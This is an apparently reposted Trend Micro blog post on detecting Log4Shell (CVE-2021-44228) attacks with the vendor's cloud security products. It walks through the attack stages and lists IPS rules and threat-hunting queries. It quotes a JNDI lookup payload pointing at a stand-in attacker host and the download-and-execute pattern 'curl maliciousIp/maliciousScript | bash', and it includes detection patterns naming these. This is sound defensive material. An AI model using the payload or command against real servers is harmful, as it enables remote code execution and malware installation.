{"id":45052,"date":"2022-01-27T00:00:00","date_gmt":"2022-01-27T00:00:00","guid":{"rendered":"urn:uuid:31840138-6ae8-6dd9-2e9e-086eed757fc4"},"modified":"2022-01-27T00:00:00","modified_gmt":"2022-01-27T00:00:00","slug":"how-to-detect-apache-log4j-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","title":{"rendered":"How to detect Apache Log4j vulnerabilities"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/thumb-how-to-apache.jpg\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <!-- Begin mPulse library --> <!-- END mPulse library --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\" content=\"This article explains how to detect the infamous Log4j vulnerability (CVE-2021-44228) that allows attackers to achieve remote code execution on the victims' servers.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"workload security,cloud native,how to,network security,article,multi cloud\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"defaultArticleWithoutHero\"> <meta property=\"article:published_time\" content=\"2022-01-27\"> <meta property=\"article:tag\" content=\"network security\"> <meta property=\"article:section\" content=\"how to\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/22\/a\/detect-log4j-vulnerabilities.html\"> <title>How to Detect Apache Log4j Vulnerabilities<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/devops\/22\/a\/detect-log4j-vulnerabilities.html\"><br \/>\n<meta property=\"og:title\" content=\"How to Detect Apache Log4j Vulnerabilities\"><br \/>\n<meta property=\"og:description\" content=\"This article explains how to detect the infamous Log4j vulnerability (CVE-2021-44228) that allows attackers to achieve remote code execution on the victims' servers.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/thumb-how-to-apache.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"How to Detect Apache Log4j Vulnerabilities\"><br \/>\n<meta name=\"twitter:description\" content=\"This article explains how to detect the infamous Log4j vulnerability (CVE-2021-44228) that allows attackers to achieve remote code execution on the victims' servers.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/thumb-how-to-apache.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business context-devops\" id=\"readabilityBody\" readability=\"50.665432514305\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"241971700\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"7.2163865546218\">\n<div class=\"article-details\" role=\"heading\" readability=\"33.676470588235\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Network Security<\/p>\n<p class=\"article-details__description\">Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.<\/p>\n<p class=\"article-details__author-by\">By: Nitesh Surana <time class=\"article-details__date\">January 27, 2022<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"30.258620689655\">\n<div readability=\"14.288793103448\">\n<p>In my previous blog, I reviewed&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/l\/how-to-detect-apache-http-server-exploitation.html\">how to detect Apache HTTP server exploitation<\/a>&nbsp;from vulnerabilities in October. Weirdly enough, I wrote that article before the&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html\">Apache Log4j (Log4Shell) news broke in December 2021<\/a>. So I\u2019m back to write about how to detect the infamous Log4j vulnerability (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\" target=\"_blank\" rel=\"noopener\">CVE-2021-44228<\/a>) that allows attackers to achieve remote code execution on the victim servers using the vulnerable versions of the popular library in exposed web applications\/services.<\/p>\n<p><span class=\"body-subhead-title\">Stages of Log4j attack<\/span><\/p>\n<p>Before diving straight into detection\/prevention, let\u2019s first take a look at the different stages of the attack. For majority of the attacks wherein Log4j is exploited, the flow looks like this:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-1.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Source: Trend Micro<\/p>\n<p>The above depicts a vulnerable public facing web service that logs the <b>User-Agent<\/b> field from the HTTP request. Here\u2019s how the attack works:<\/p>\n<ol>\n<li>The malicious Java Naming Directory Interface (JDNI) payload can arrive in any protocol; it just needs to reach the vulnerable Log4j logging mechanism. In this case, the protocol is HTTP and the payload is sent in the \u2018User-Agent\u2019 header.<\/li>\n<li>The value of User-Agent header is logged by a vulnerable web application using the Log4j library. Logging of fields like these is common in Java-based applications.<\/li>\n<li>The payload ${jndi:ldap:\/\/attacker\/a} is looked up using JNDI, which in turn tries accessing the LDAP server.<\/li>\n<li>If remote loading of Java classes is enabled (i.e., if com.sun.jndi.ldap.object.trustURLCodebase is set to true), the attacker\u2019s infrastructure is called to using a set of protocols (LDAP in this case).<\/li>\n<li>The LDAP response can contain either of the two:<\/li>\n<\/ol>\n<ol type=\"a\">\n<li>The response itself might contain the malicious Java bytecode<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-2.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol type=\"a\" start=\"2\">\n<li>The response contains a reference to the attacker\u2019s infrastructure from where the malicious Java class file is fetched.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-3.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>In this case, the Java class file is fetched as follows:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-4.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.5\">\n<div readability=\"28\">\n<ol start=\"6\">\n<li>The malicious bytecode is executed, which in turn leads to malicious command and control in step 7.<\/li>\n<li>Malicious command and control is observed between attacker\u2019s infrastructure and the vulnerable server<\/li>\n<\/ol>\n<p><span class=\"body-subhead-title\">Detection of Log4j&nbsp;<\/span><\/p>\n<p>Now that we have a fair understanding of what the vulnerability is and how it looks, let\u2019s explore how to detect Log4j attacks using Trend Micro Cloud One\u2122 and Trend Micro Vision One\u2122.<\/p>\n<p>As I mentioned in the last blog, Trend Micro Cloud One is a security services platform for cloud builders composed of seven services. It is integrated with Trend Micro Vision One, which leverages industry-leading XDR capabilities to collect, correlate, and display data from Trend Micro Cloud One in a straightforward dashboard.<\/p>\n<p>In this scenario, we used Trend Micro Cloud One\u2122 \u2013 Network Security and Trend Micro Cloud One\u2122 \u2013 Workload Security detect Log4j vulnerabilities. Network Security goes beyond traditional intrusion prevention systems (IPS) to inspect ingress and egress traffic, adding another layer of protection between the vulnerable Log4j library. Simultaneously, Workload Security ensures your containers and datacenters are secured with automated scanning and customazible post-scan actions.<\/p>\n<p>Let\u2019s dissect how Workload Security works:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-5.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-6.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>Here we see how the different Workload Security modules work in tandem, capturing the overview of different stages of a successful exploit attempt.<\/p>\n<p>The following is a list of IPS rules for detecting Log4j:<\/p>\n<ol>\n<li>1011242 &#8211; Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228 and CVE-2021-45046)<\/li>\n<li>1011249 &#8211; Apache Log4j Denial of Service Vulnerability (CVE-2021-45105)<\/li>\n<li>1005177 &#8211; Restrict Java Bytecode File (Jar\/Class) Download<br \/>&nbsp;<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-7.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-8.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-9.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Here\u2019s how the rules work to detect the attack at different stages:<\/p>\n<ol>\n<li>IPS rule 1011242 \u2013 Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) detects stage one of the attack, wherein JNDI payload is injected in the request body\/header\/URI\/uriquery.<\/li>\n<li>IPS rule 1011249 \u2013 Apache Log4j Denial of Service Vulnerability (CVE-2021-45105) detects traffic with the Denial Of Service JNDI payload in the request body\/header\/URI\/uriquery.<\/li>\n<li>IPS rule 1005177 &#8211; Restrict Java Bytecode File (Jar\/Class) Download triggers when a client downloads a .class or .jar file, which executes attacker-controlled, malicious code on a target.<\/li>\n<\/ol>\n<p>We also use a log inspection rule to detect the vulnerability.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-10.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The log inspection rule <b>1011241 \u2013 Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) <\/b>looks for JNDI payloads in the access logs, with the default path being <b>\/var\/log\/*\/access.log.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-11.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.797747942832\">\n<div readability=\"13.715028150715\">\n<p>Different log sources from other applications can be configured to inspect logs by adding log files using their absolute paths in the <b>Configuration <\/b>tab.<\/p>\n<p>Now that we\u2019ve covered Workload Security detections, let\u2019s review Network Security helps detect and prevent exploitation of Log4j vulnerabilities using the following IPS filters:<\/p>\n<ol>\n<li>40652: HTTP: Apache Log4j StrSubstitutor Denial-of-Service Vulnerability (ZDI-21-1541) detects an attempt to exploit a <a href=\"https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-21-1541\/\" target=\"_blank\" rel=\"noopener\">denial-of-service vulnerability in Apache Log4j<\/a>. The specific flaw exists due to a failure to properly sanitize values being logged. Successful exploitation results in a denial-of-service condition.<\/li>\n<li>40651: HTTP: JNDI Recursive Variable Replacement in an HTTP Request detects the usage of a recursive variable replacement within a JNDI expression in an HTTP request. While not inherently malicious, traffic of this nature can be used to create a denial-of-service condition in some vulnerable configurations of Log4j or be used to bypass detection of other jndi vulnerabilities.<\/li>\n<li>40627: HTTP: JNDI Injection in HTTP Request detects an attempt to inject JNDI requests in HTTP request. While not inherently malicious, the presence of JNDI code in the HTTP requests can be indicative of an attempt to exploit a known code execution vulnerability in Log4j.<\/li>\n<li>13876: TCP: Download\/Upload of a Java .class Application detect an attempt to download or upload a .class Java file. Oracle Java is an object oriented programming language used across a vast amount of devices and appliances. Based on the expected common occurrence of matches in this filter&#8217;s logic, it should not be deployed inline with a blocking action set until fully performance tested and vetted for false positives in its target production environment. This is a policy filter which, when enabled in certain deployments, may be prone to false positive conditions as well as possible performance impacts. If Oracle Java is not deployed or anticipated for deployment in your network, this filter should not be enabled in blocking mode.<\/li>\n<li>40640: LDAP: Generic BIND Request (Non-Standard Ports) detects an LDAP BIND request on non-standard ports.<\/li>\n<li>40646: LDAP: Generic BIND Request (Standard Ports) filter detects an LDAP BIND request on standard ports.<\/li>\n<\/ol>\n<p><span class=\"body-subhead-title\">Tying it all together with Trend Micro Vision One<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-12.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.5\">\n<div readability=\"34\">\n<p>Observed attack techniques from Trend Micro Vision One<\/p>\n<p>We\u2019ve seen how Network Security and Workload Security can detect Log4j vulnerabilities, but what good is that information on its own? Trend Micro Vision One puts together the puzzle so you can have comprehensive visibility across all data in one console. Let\u2019s dive into what you can see (pun intended) with Trend Micro Vision One:<\/p>\n<p><i>Observed attack techniques (OATs)<\/i><\/p>\n<p>These are individual alerts that indicate unit steps of high importance (for example, IPS trigger for Log4j remote code execution (RCE) vulnerability or log Inspection trigger for Log4j JNDI Payload in access logs).<\/p>\n<p>Trend Micro Vision One Threat Hunting app helps you see if anything suspicious or alarming happening across endpoints. In this example, the following OATs need to be investigated to narrow down on the whereabouts of a possible intrusion:<\/p>\n<p>F4778 \u2013 Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)<br \/>F4779 \u2013 Log4j Remote Code Execution Vulnerability (CVE-2021-44228)<br \/>F4780 \u2013 Restrict Java Bytecode File (Jar or Class) Download<br \/>F4783 &#8211; Vulnerable LOG4J Version for CVE-2021-44228<br \/>F4801 \u2013 Apache Log4j Denial of Service Vulnerability<br \/>F4795 \u2013 Apache Log4j Remote Code Execution<\/p>\n<p><i>Search App Queries<\/i><\/p>\n<p>The Search app helps find malicious JNDI payloads from different module detections from Workload Security across all endpoints leveraging Trend Micro Vision One. Below are examples of searches I made based on my understanding of the vulnerability and where visible events show up:<\/p>\n<ol>\n<li>Using Search Method: Endpoint Activity Data, look for a parent process with java in the file path creating a curl or wget process. In the majority of attacks observed, curl and wget have been used to download and run malicious scripts and executables on vulnerable servers.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-13.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>Search: (processCmd:curl OR processCmd:wget) AND parentFilePath:*java*<\/p>\n<ol start=\"2\" readability=\"-1.5\">\n<li readability=\"0\">JNDI payload patterns in msg field of Workload Security prevention triggers.\n<p>Search: eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1011249) AND (&#8220;${&#8221; AND (&#8220;lower:&#8221; OR &#8220;upper:&#8221; OR &#8220;sys:&#8221; OR &#8220;env:&#8221; OR &#8220;java:&#8221; OR &#8220;jndi:&#8221;))<\/p>\n<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-14.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"3\" readability=\"-1.5\">\n<li readability=\"0\">JNDI payload patterns in remarks field of Workload Security log Inspection triggers \u2013\n<p>Search: eventName:LOG_INSPECTION_EVENT AND (&#8220;${&#8221; AND (&#8220;lower:&#8221; OR &#8220;upper:&#8221; OR &#8220;sys:&#8221; OR &#8220;env:&#8221; OR &#8220;java:&#8221; OR &#8220;jndi:&#8221;))<\/p>\n<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-15.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p><i>Root-cause analysis (RCA)<\/i><\/p>\n<p>Using Trend Micro Vision One, we can use the Execution Profile to perform a deeper RCA, helping analysts understand the chain of events of the attacks that attempt to exploit Log4j.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-16.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>In the attacks we observed, the Log4j vulnerability is exploited to download malicious shell scripts on the target machine using <b>curl <\/b>or <b>wget <\/b>and execute them by piping them to <b>bash <\/b>or <b>sh<\/b>: curl maliciousIp\/maliciousScript | bash.<\/p>\n<p>The RCA above explains the outbound connections to attacker controlled IP address and the creation of Executable and Linkable Format (ELF) binaries. The ELFs downloaded are made executable by using the <b>chmod <\/b>utility.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-17.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>In this RCA, we see execution of shell commands like <b>clear<\/b>, <b>id<\/b>, and <b>whoami<\/b>, which are being executed where <b>systemd-shell<\/b> is the parent process. As we can see, they stem from the <b>bash <\/b>shell and the command line is logged by the Activity Monitoring module.<\/p>\n<p><i>Workbench<\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-18.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-19.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The Trend Micro Vision One Workbench helps you visualize and take action on the most significant events observed in an environment. These detections include telemetry from various Trend Micro products (in this case, Trend Micro Cloud One services) and the Workbench condenses them into a single pane of glass view.<\/p>\n<p>Here we see <b>Bash Shell Script Execution<\/b> is observed right after the IPS trigger for Log4j. The Impact Scope displays the number of hosts\/servers observed for correlation activity to the alert. The highlighted fields (<b>processCmd<\/b>, <b>processFilePath<\/b>) on the left are what\u2019s being monitored across other deployments and workloads throughout the organization.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-20.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-21.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.119658119658\">\n<div readability=\"10.373219373219\">\n<p>In this trigger, we see the outbound network activity to a known cryptocurrency mining pool after the Log4j vulnerability is exploited. Attackers have been exploiting the vulnerability to deliver cryptocurrency coinminers and <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/g\/mirai-botnet-attack-iot-devices-via-cve-2020-5902.html\">MIRAI botnet malware<\/a>. The Command and Control (C&amp;C) observed is logged by the Web Reputation Service and Activity Monitoring.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-22.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>In this Workbench trigger, the event is from the Log Inspection module, wherein the JNDI payload was observed in the access logs of a web server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-23.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"26.8125\">\n<div readability=\"8.25\">\n<p><span class=\"body-subhead-title\">Next steps<\/span><\/p>\n<p>Keep up to date on developing Log4Shell news here. You can also <a href=\"https:\/\/cloudone.trendmicro.com\/trial\" target=\"_blank\" rel=\"noopener\">start a free trial<\/a> or check out our <a href=\"https:\/\/cloudone.trendmicro.com\/docs\/?_ga=2.41688935.491843228.1642438585-undefined&amp;_gac=1.222199146.1641915013.Cj0KCQiA8vSOBhCkARIsAGdp6RQh2xY-pI-nrwoqrS1BZ3NGml1py5GO_dOsM7Yg21O7nETAwVI05zAaAnrSEALw_wcB\" target=\"_blank\" rel=\"noopener\">extensive documentation library<\/a> to see how Trend Micro Vision One powers layered detection and response for our cloud-builder security platform, Trend Micro Cloud One.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/22\/a\/detect-log4j-vulnerabilities.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":45053,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9503,9501,9571,9507,9676,9500],"class_list":["post-45052","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-devops-article","tag-trend-micro-devops-cloud-native","tag-trend-micro-devops-how-to","tag-trend-micro-devops-multi-cloud","tag-trend-micro-devops-network-security","tag-trend-micro-devops-workload-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-01-27T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/thumb-how-to-apache.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" 